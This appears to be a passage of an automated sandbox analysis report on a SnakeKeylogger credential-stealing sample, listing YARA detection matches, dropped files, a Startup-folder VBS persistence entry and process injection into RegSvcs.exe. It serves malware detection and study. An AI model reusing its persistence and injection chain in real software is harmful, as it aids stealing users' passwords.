                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_030DE9883_2_030DE988
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_030D69B03_2_030D69B0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_030DCFA93_2_030DCFA9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_030DCCD83_2_030DCCD8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_030DF9613_2_030DF961
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_030DE97B3_2_030DE97B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_030D29E03_2_030D29E0
                  Source: C:\Users\user\AppData\Local\translucently\enterogenous.exeCode function: 6_2_0174D0C06_2_0174D0C0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_019271187_2_01927118
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0192C1487_2_0192C148
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_019253627_2_01925362
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0192D2787_2_0192D278
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0192C4687_2_0192C468
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0192C7387_2_0192C738
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0192E9887_2_0192E988
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_019269B07_2_019269B0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0192CA087_2_0192CA08
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01929DE07_2_01929DE0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0192CCD87_2_0192CCD8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0192CFA97_2_0192CFA9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_019229E07_2_019229E0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0192F9707_2_0192F970
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0192E97B7_2_0192E97B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01923E187_2_01923E18
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_06C71E807_2_06C71E80
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_06C7E6B07_2_06C7E6B0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_06C717A07_2_06C717A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_06C7FC687_2_06C7FC68
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_06C79C187_2_06C79C18
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_06C795487_2_06C79548
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_06C70B307_2_06C70B30
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_06C750287_2_06C75028
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_06C729687_2_06C72968
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_06C7E6AF7_2_06C7E6AF
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_06C71E707_2_06C71E70
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_06C7DE007_2_06C7DE00
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_06C7178F7_2_06C7178F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_06C7EF517_2_06C7EF51
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_06C7EF607_2_06C7EF60
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_06C7CCA07_2_06C7CCA0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_06C7DDFF7_2_06C7DDFF
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_06C7D5507_2_06C7D550
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_06C7E2577_2_06C7E257
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_06C7E2587_2_06C7E258
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_06C78BA07_2_06C78BA0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_06C7F3B87_2_06C7F3B8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_06C7EB087_2_06C7EB08
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_06C70B207_2_06C70B20
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_06C7D0F87_2_06C7D0F8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_06C700407_2_06C70040
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_06C7F8107_2_06C7F810
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_06C7501E7_2_06C7501E
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_06C700317_2_06C70031
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_06C7D9A77_2_06C7D9A7
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_06C7D9A87_2_06C7D9A8
                  Source: C:\Users\user\AppData\Local\translucently\enterogenous.exeCode function: String function: 00A4F9F2 appears 40 times
                  Source: C:\Users\user\AppData\Local\translucently\enterogenous.exeCode function: String function: 00A39CB3 appears 31 times
                  Source: C:\Users\user\AppData\Local\translucently\enterogenous.exeCode function: String function: 00A50A30 appears 46 times
                  Source: C:\Users\user\AppData\Local\translucently\enterogenous.exeCode function: String function: 00A54963 appears 31 times
                  Source: C:\Users\user\Desktop\ty1nyFUMlo.exeCode function: String function: 0052F9F2 appears 40 times
                  Source: C:\Users\user\Desktop\ty1nyFUMlo.exeCode function: String function: 00534963 appears 31 times
                  Source: C:\Users\user\Desktop\ty1nyFUMlo.exeCode function: String function: 00530A30 appears 46 times
                  Source: C:\Users\user\Desktop\ty1nyFUMlo.exeCode function: String function: 00519CB3 appears 31 times
                  Source: ty1nyFUMlo.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                  Source: 6.2.enterogenous.exe.3b50000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 6.2.enterogenous.exe.3b50000.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 6.2.enterogenous.exe.3b50000.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 6.2.enterogenous.exe.3b50000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 6.2.enterogenous.exe.3b50000.1.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 6.2.enterogenous.exe.3b50000.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 2.2.enterogenous.exe.4370000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 2.2.enterogenous.exe.4370000.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 2.2.enterogenous.exe.4370000.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 2.2.enterogenous.exe.4370000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 2.2.enterogenous.exe.4370000.1.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 2.2.enterogenous.exe.4370000.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 00000003.00000002.3791163222.0000000000403000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 00000002.00000002.1408624551.0000000004370000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 00000002.00000002.1408624551.0000000004370000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 00000002.00000002.1408624551.0000000004370000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 00000006.00000002.1567496697.0000000003B50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 00000006.00000002.1567496697.0000000003B50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 00000006.00000002.1567496697.0000000003B50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: Process Memory Space: enterogenous.exe PID: 7460, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: Process Memory Space: RegSvcs.exe PID: 7496, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: Process Memory Space: enterogenous.exe PID: 7760, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winEXE@10/6@4/4
                  Source: C:\Users\user\Desktop\ty1nyFUMlo.exeCode function: 0_2_005837B5 GetLastError,FormatMessageW,0_2_005837B5
                  Source: C:\Users\user\Desktop\ty1nyFUMlo.exeCode function: 0_2_005710BF AdjustTokenPrivileges,CloseHandle,0_2_005710BF
                  Source: C:\Users\user\Desktop\ty1nyFUMlo.exeCode function: 0_2_005716C3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_005716C3
                  Source: C:\Users\user\AppData\Local\translucently\enterogenous.exeCode function: 2_2_00A910BF AdjustTokenPrivileges,CloseHandle,2_2_00A910BF
                  Source: C:\Users\user\AppData\Local\translucently\enterogenous.exeCode function: 2_2_00A916C3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,2_2_00A916C3
                  Source: C:\Users\user\Desktop\ty1nyFUMlo.exeCode function: 0_2_005851CD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_005851CD
                  Source: C:\Users\user\Desktop\ty1nyFUMlo.exeCode function: 0_2_0059A67C CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,0_2_0059A67C
                  Source: C:\Users\user\Desktop\ty1nyFUMlo.exeCode function: 0_2_0058648E _wcslen,CoInitialize,CoCreateInstance,CoUninitialize,0_2_0058648E
                  Source: C:\Users\user\Desktop\ty1nyFUMlo.exeCode function: 0_2_005142A2 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_005142A2
                  Source: C:\Users\user\Desktop\ty1nyFUMlo.exeFile created: C:\Users\user\AppData\Local\translucentlyJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMutant created: NULL
                  Source: C:\Users\user\Desktop\ty1nyFUMlo.exeFile created: C:\Users\user\AppData\Local\Temp\aut79C7.tmpJump to behavior
                  Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\enterogenous.vbs"
                  Source: ty1nyFUMlo.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                  Source: C:\Users\user\Desktop\ty1nyFUMlo.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: RegSvcs.exe, 00000003.00000002.3795172591.00000000034E7000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3795172591.00000000034D7000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3795172591.0000000003526000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3795172591.000000000351A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3795172591.00000000034F5000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3794762480.0000000003555000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3794762480.0000000003594000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3794762480.0000000003588000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3794762480.0000000003563000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                  Source: ty1nyFUMlo.exeVirustotal: Detection: 61%
                  Source: ty1nyFUMlo.exeReversingLabs: Detection: 73%
                  Source: C:\Users\user\Desktop\ty1nyFUMlo.exeFile read: C:\Users\user\Desktop\ty1nyFUMlo.exeJump to behavior
                  Source: unknownProcess created: C:\Users\user\Desktop\ty1nyFUMlo.exe "C:\Users\user\Desktop\ty1nyFUMlo.exe"
                  Source: C:\Users\user\Desktop\ty1nyFUMlo.exeProcess created: C:\Users\user\AppData\Local\translucently\enterogenous.exe "C:\Users\user\Desktop\ty1nyFUMlo.exe"
                  Source: C:\Users\user\AppData\Local\translucently\enterogenous.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\ty1nyFUMlo.exe"
                  Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\enterogenous.vbs"
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\translucently\enterogenous.exe "C:\Users\user\AppData\Local\translucently\enterogenous.exe"
                  Source: C:\Users\user\AppData\Local\translucently\enterogenous.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\translucently\enterogenous.exe"
                  Source: C:\Users\user\Desktop\ty1nyFUMlo.exeProcess created: C:\Users\user\AppData\Local\translucently\enterogenous.exe "C:\Users\user\Desktop\ty1nyFUMlo.exe"Jump to behavior
                  Source: C:\Users\user\AppData\Local\translucently\enterogenous.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\ty1nyFUMlo.exe"Jump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\translucently\enterogenous.exe "C:\Users\user\AppData\Local\translucently\enterogenous.exe" Jump to behavior
                  Source: C:\Users\user\AppData\Local\translucently\enterogenous.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\translucently\enterogenous.exe" Jump to behavior
                  Source: C:\Users\user\Desktop\ty1nyFUMlo.exeSection loaded: wsock32.dllJump to behavior
                  Source: C:\Users\user\Desktop\ty1nyFUMlo.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\Desktop\ty1nyFUMlo.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Users\user\Desktop\ty1nyFUMlo.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Users\user\Desktop\ty1nyFUMlo.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Users\user\Desktop\ty1nyFUMlo.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\ty1nyFUMlo.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\Desktop\ty1nyFUMlo.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\Desktop\ty1nyFUMlo.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\ty1nyFUMlo.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\ty1nyFUMlo.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\Desktop\ty1nyFUMlo.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\Desktop\ty1nyFUMlo.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\Desktop\ty1nyFUMlo.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\Desktop\ty1nyFUMlo.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\translucently\enterogenous.exeSection loaded: wsock32.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\translucently\enterogenous.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\translucently\enterogenous.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\translucently\enterogenous.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\translucently\enterogenous.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\translucently\enterogenous.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\translucently\enterogenous.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\translucently\enterogenous.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\translucently\enterogenous.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\translucently\enterogenous.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\translucently\enterogenous.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: mlang.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
